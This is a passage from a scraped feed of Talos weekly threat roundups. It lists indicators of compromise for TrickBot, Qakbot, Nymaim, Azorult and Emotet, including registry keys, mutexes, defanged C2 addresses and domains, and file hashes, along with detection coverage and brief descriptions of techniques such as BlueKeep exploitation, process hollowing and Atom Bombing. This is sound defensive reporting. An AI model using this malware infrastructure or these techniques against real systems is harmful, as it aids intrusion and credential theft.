\n`%ProgramData%\\Microsoft\\RAC\\StateData\\_41-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\Default Pictures\\_33-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\_34-INSTRUCTION.html` | 7 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906 085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96 14f9231bd987060133bc1e2908a9a5691e829d6f2cc43010f943e4070b0102cf 
2f5776b368011a76db2c690252846d0e3a90ccd27d9575e015663cebaf58db23 5815f647ad348de649c3ebfb5f1987e305410855cc944d14b1284abaaa40d9e3 593ead1c717d2ca3ed32fa98da70f4df7e0a99431d0327fc08c363621afc1fbe a515545e6056e1a9f75a4f7d0afefb54bf7e1ffb1e5f7f6641cece38db7e6cf0 bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a c11b9d1ba0badcc063eb6e60894b7f4f0932e4f73d037f05e06c80d72833b328 c4cfc1a33b5e956376c773674c1a8baa318832f2d75fac9efe53fbc895ace7da cb73396e304937a404c63ad696c6e2d269f38d8082d636e2c16e550f1f7cb118 cd8b407e19e2d93dfc939cd04e3a43100d2442128f42c226ac1dedeba0da4824 d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39 d6e35e20d5b7fa3d0b5352b4953701cabb4ed2a83d94dc666ef9900b7c53394a d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2 d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a fd1e8a916fa218df73894c59784dc94cbd26c7c7a5e1c1ee37ce45b349e4cc2c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZnBq2sVehBU/XkbmO3anDII/AAAAAAAADT0/wj80al3dA3Ajcuw_6SUUQGjAbQBgazCKwCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Dcj1XBW55ao/XkbmSCbeXFI/AAAAAAAADT8/pnsmYG6HaCEaZmf3NOYrkEwtxv19k74ngCLcBGAsYHQ/s1600/d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ex3DbvgX5Ow/XkbmWdet0wI/AAAAAAAADUA/_sFoL3ZJzrMq-GDxOkYCpFiKfjXbT52XgCLcBGAsYHQ/s1600/d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39_umbrella.png>)\n\n \n\n\n#### 
Malware\n\n[](<https://1.bp.blogspot.com/-jLsjhr0_epY/Xkbmb2rgrAI/AAAAAAAADUE/klXR0xSE4z0KByVybr4Jm2WbNY_XVV7RQCLcBGAsYHQ/s1600/0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (4662) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (749) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nKovter injection detected \\- (319) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. 
It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (206) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (188) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nAtom Bombing code injection technique detected \\- (133) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nInstallcore adware detected \\- (105) \nInstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (75) \nDealPly is adware, which claims to improve your online shopping experience. 
It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (30) \nAn exploit payload intended to connect back to an attacker-controlled host using HTTP has been detected. \nCorebot malware detected \\- (20) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "cvss3": {}, "published": "2020-02-14T11:35:23", "type": "talosblog", "title": "Threat Roundup for February 7 to February 14", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2020-02-14T11:35:23", "id": "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3m6HBreCgdU/threat-roundup-0207-0214.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T21:27:12", "description": "Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 17 and Jan. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. 
\n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Packed.TrickBot-7541396-1 | Packed | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.Qakbot-7541405-1 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Packed.Nymaim-7542552-1 | Packed | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. 
\nWin.Malware.Azorult-7541464-1 | Malware | Azorult is a banking trojan that attempts to steal credit card data and other sensitive information to facilitate cybercrime. \nDoc.Malware.Emotet-7544675-1 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Worm.Vobfus-7541859-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers. \nWin.Trojan.XpertRAT-7550253-1 | Trojan | XpertRAT is a remote access trojan that provides an attacker with the ability to access an infected machine remotely and has the ability to steal sensitive information like usernames and passwords. XpertRAT has been around since 2011 and consists of a core component and multiple modules, all written in Delphi. \nWin.Trojan.Upatre-7549404-0 | Trojan | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Packed.Passwordstealera-7544289-0 | Packed | This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed. 
\n \n* * *\n\n## Threat Breakdown\n\n### Win.Packed.TrickBot-7541396-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: RefCount ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 40 \nIP Addresses contacted by malware. Does not indicate maliciousness: see the JSON for the full list.\n\nDomain Names contacted by malware. Does not indicate maliciousness: see the JSON for the full list.\n\nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Task Gpu health` | 40 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 40 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 40 \n`None` | 39 \n`%APPDATA%\\DirectTools\\data` | 25 \n`%APPDATA%\\DirectTools\\settings.ini` | 25 \n`%APPDATA%\\gpuhealth` | 15 \n`%APPDATA%\\gpuhealth\\data` | 15 \n`%APPDATA%\\gpuhealth\\settings.ini` | 15 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n \n#### File Hashes\n\nSee the JSON for the full list of file hashes.\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\nThreatGrid detection screenshot (image not reproduced).\n\n* * *\n\n
### Win.Dropper.Qakbot-7541405-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`ocmwn` | 22 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 22 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 22 \n`\\TEMP\\437d5b4d9e4c5d8ab4615871f9e7830c.exe` | 1 \n`\\TEMP\\385ece7d547122fba5d712c7495a6721.exe` | 1 \n`\\TEMP\\c09a343a545e0f9e36444a847e3ad5ac.exe` | 1 \n`\\TEMP\\c78811efdd2612e5ca25249df2cf7600.exe` | 1 \n \n#### File Hashes\n\nSee the JSON for the full list of file hashes.\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\nThreatGrid detection screenshot (image not reproduced).\n\n* * *\n\n
### Win.Packed.Nymaim-7542552-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 15 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 15 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 15 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 15 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 15 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 15 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 15 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 15 \n`Local\\{888E04DB-EDDB-D2EC-5F32-1719D74FA2E0}` | 15 \n`Local\\{D876A547-0EDD-4A55-0873-9F0D6D3719FB}` | 15 \nDomain Names contacted by malware. Does not indicate maliciousness: see the JSON for the full list.\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 15 \n`%ProgramData%\\ph\\fktiipx.ftf` | 15 \n`%TEMP%\\gocf.ksv` | 15 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%TEMP%\\fro.dfx` | 12 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 12 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\haqhxh.vsz` | 1 \n`\\Documents and Settings\\All Users\\po\\vikog.axh` | 1 \n \n#### File Hashes\n\nSee the JSON for the full list of file hashes.\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\nThreatGrid detection screenshot (image not reproduced).\n\n* * *\n\n
### Win.Malware.Azorult-7541464-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\PICTURE ` | 20 \n`<HKCU>\\SOFTWARE\\PICTURE\\PICTUREPROCESSINGTOOLSV1.0 ` | 20 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: GlobalAssocChangedCounter ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayVersion ` | 10 
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMajor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMinor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Publisher ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayIcon ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: UninstallString ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: URLInfoAbout ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: HelpLink ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallLocation ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallSource ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Language ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoModify ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoRepair ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallDate ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: EstimatedSize ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Type ` | 9 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: DisplayName ` | 9 \nMutexes | Occurrences \n---|--- \n`d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963}` | 10 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 10 \n`Global\\<random guid>` | 10 \n`01B1CA98-EE2E-41B3-8A2F-F319643109E5` | 2 \n`None` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]83[.]52[.]40` | 20 \n`103[.]91[.]210[.]187` | 11 \n`45[.]139[.]236[.]14` | 10 \n`23[.]106[.]124[.]148` | 10 \n`45[.]76[.]18[.]39` | 9 \n`37[.]140[.]192[.]153` | 9 \n`104[.]27[.]185[.]71` | 7 \n`185[.]99[.]133[.]121` | 6 \n`37[.]140[.]192[.]166` | 6 \n`88[.]99[.]66[.]31` | 5 \n`13[.]107[.]21[.]200` | 4 \n`93[.]190[.]142[.]79` | 3 \n`208[.]95[.]112[.]1` | 3 \n`209[.]141[.]34[.]150` | 3 \n`216[.]83[.]52[.]19` | 3 \n`104[.]27[.]184[.]71` | 3 \n`183[.]131[.]207[.]66` | 2 \n`216[.]83[.]52[.]20` | 2 \n`204[.]79[.]197[.]200` | 1 \n`220[.]243[.]236[.]20` | 1 \n`220[.]242[.]158[.]12` | 1 \n`104[.]28[.]10[.]3` | 1 \n`204[.]188[.]226[.]98` | 1 \n`104[.]27[.]171[.]106` | 1 \n`194[.]36[.]188[.]13` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`iplogger[.]org` | 10 \n`silvergeoa[.]com` | 10 \n`area[.]cyp360[.]com` | 10 \n`installsilver[.]com` | 9 \n`confirmssystems[.]com` | 9 \n`passwordkernel[.]online` | 9 \n`123321123[.]fun` | 6 \n`scp46[.]hosting[.]reg[.]ru` | 4 \n`ip-api[.]com` | 3 \n`myprintscreen[.]com` | 3 \n`fbinstall[.]cyp360[.]com` | 3 \n`ok` | 2 \n`js[.]users[.]51[.]la` | 2 \n`ia[.]51[.]la` | 2 \n`budison-oklarly[.]com` | 2 \n`ac[.]681776[.]com` | 2 \n`yip[.]su` | 1 \n`megagemes[.]info` | 1 \n`termscenter[.]com` | 1 \n`cleand8yv0m6g[.]top` | 1 \n`newbook-t[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\d` | 20 \n`\\TEMP\\d-shm` | 20 \n`\\TEMP\\d-wal` | 20 \n`%TEMP%\\~atmp` | 11 \n`%ProgramData%` | 10 \n`%TEMP%\\$inst` | 10 \n`%TEMP%\\$inst\\2.tmp` | 10 \n`%TEMP%\\$inst\\temp_0.tmp` | 10 \n`\\TEMP\\config.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper1.exe` | 10 \n`%SystemRoot%\\wotsuper.reg` | 10 \n`%ProgramData%\\freebl3.dll` | 9 \n`%ProgramData%\\mozglue.dll` | 9 \n`%SystemRoot%\\SysWOW64\\config.ini` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-shm` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-wal` | 9 \n`%ProgramData%\\msvcp140.dll` | 8 \n`%ProgramData%\\nss3.dll` | 6 \n`%HOMEPATH%\\pwordkrn.exe` | 6 \n`%ProgramData%\\softokn3.dll` | 5 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0034790f990238fe8e57d28800a8498bce5bdf3604cc56fc670ac5d65c6e5e08 249de6212474007cb9cf42a68939fae2f769f2097a57afa664a4780b2641228e 275eb1700ac5dbe3b62ce16a06409c4866728f72ee9e5c10f43beba094038475 48ab169b253421d2ece727161c6ff26c47836d5905fa685812010c6de4b75b27 
681297a82e85822a1cb5a58296a515151f417bb8aafe5d4505d2219b4fe61438 70576eb8cd35093b1ef56da7fb39bf88f32c57f410484d613b5028cecbb1b0df 743238d01b2f968044ee2b175c61574aca518874c67201146f19df5a53c3b0d2 7e71eda28ecca392d6e86a9004c3bd38c7cbdf79399e90742feac5fa066aba66 a6abe3b046e8bdcfb33fa9776195fbb89a3e4218f6bb281aedd15f28fe1f4818 bad303ab4b68379128469e3be92d5bf3b23ec7bb285a260b1fadeead3fe43bbf bc55f494359805cc4d89f6812c3a1a14d593d9ead82267dcae7029dcbddebcab be2201940b246ae89cae4f6d0a691a1092289868230f1da85f9142d180709744 c66fe1a34cbe3a966ecbd1beb87b425e004a4a21f38bd483c2c10ef7c77e5e0b c8a3cb15adb8639ceaa0092b3a7f69f362cb48bcd96ffd18d362a38a1fbfff41 d39e3e47d12347b27f81a75751145bf6915b6a12caffa2dc4b0981666339c3bb e0b5780569ee0983401f373b03909ba27babc52c258eb150939e0b9d337de594 eaa8bbd1fee19574eeed935d8756223876c64d3ca49b372c04b98b6912108586 f34e64f4e7be7e6b2c665700ec513b4783e570a4de2087ac9511f152d812b2f5 f4b4158338fe30016fb7034b70bc3babcee3be21ea5c214451d83e3cb31233d8 fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-okD3nsZ3jwI/XitOphUI3PI/AAAAAAAADKs/Git5ndVq3H02WOrg61YQTOjzMBf_dk4OQCLcBGAsYHQ/s1600/fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Malware.Emotet-7544675-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA 
\nValue Name: ImagePath ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 7 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 7 \n`Global\\M98B68E3C` | 7 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]17[.]44[.]48` | 7 \n`70[.]123[.]95[.]180` | 7 \n`74[.]220[.]194[.]30` | 7 \n`59[.]120[.]5[.]154` | 3 \n`100[.]66[.]142[.]61` | 3 \n`100[.]108[.]145[.]200` | 3 \n`100[.]87[.]27[.]180` | 3 \n`100[.]83[.]251[.]131` | 3 \n`100[.]90[.]84[.]106` | 3 \n`17[.]36[.]205[.]74` | 2 \n`74[.]202[.]142[.]71` | 2 \n`24[.]232[.]0[.]227` | 2 \n`200[.]45[.]191[.]16` | 2 \n`74[.]202[.]142[.]98/31` | 2 \n`51[.]77[.]113[.]100` | 2 \n`98[.]103[.]188[.]70` | 1 \n`200[.]107[.]202[.]33` | 1 \n`67[.]212[.]168[.]237` | 1 \n`85[.]115[.]130[.]101` | 1 \n`206[.]126[.]59[.]246` | 1 \n`162[.]211[.]85[.]171` | 1 \n`80[.]93[.]143[.]50` | 1 \n`203[.]130[.]9[.]8` | 1 \n`192[.]185[.]21[.]150` | 1 \n`192[.]185[.]2[.]205` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`jayracing[.]com` | 10 \n`rcmgdev44[.]xyz` | 3 \n`demu[.]hu` | 3 \n`itconsortium[.]net` | 3 \n`josemoo[.]com` | 3 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`smtp[.]fibertel[.]com[.]ar` | 2 \n`smtp[.]infinitummail[.]com` | 2 \n`smtp[.]arnet[.]com[.]ar` | 2 \n`smtp[.]dsl[.]telkomsa[.]net` | 2 \n`mail[.]1and1[.]com` | 1 \n`smtp[.]tcc-la[.]com` | 1 \n`smtp[.]indisa[.]cl` | 1 \n`mail[.]cemcol[.]hn` | 1 \n`mail[.]cobico[.]co` | 1 \n`cowealth[.]com[.]tw` | 1 \n`mail[.]an-car[.]it` | 1 \n`mail[.]argo[.]ge` | 1 \n`smtp[.]1und[.]de` | 1 \n`mail[.]fracma[.]co` | 1 \n`mail[.]castel[.]ge` | 1 \n`smtpvip[.]reis[.]mx` | 1 \n`mail[.]stscambodia[.]com` | 1 \n`smtp[.]netvoice[.]com[.]ph` | 1 \n`mail[.]mygrande[.]net` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\229.exe` | 10 \n \n#### File Hashes\n\n` 0c9ef55223b45ef57ef38a98bbb1675f4bb284af6a56f9157e4c86b864360719 412e213dd241031a172b48a422bbcf8e3e0b45e89a984fc45028fa96299f459a 42e61e25f4b3d2b57fa973344417602c6e43537eeef6f7fdf32f9d34bf8f3604 6c4c28356c53832f5ab0a5acc2a14f4f907188655dd315bf1e18581c4c48337e 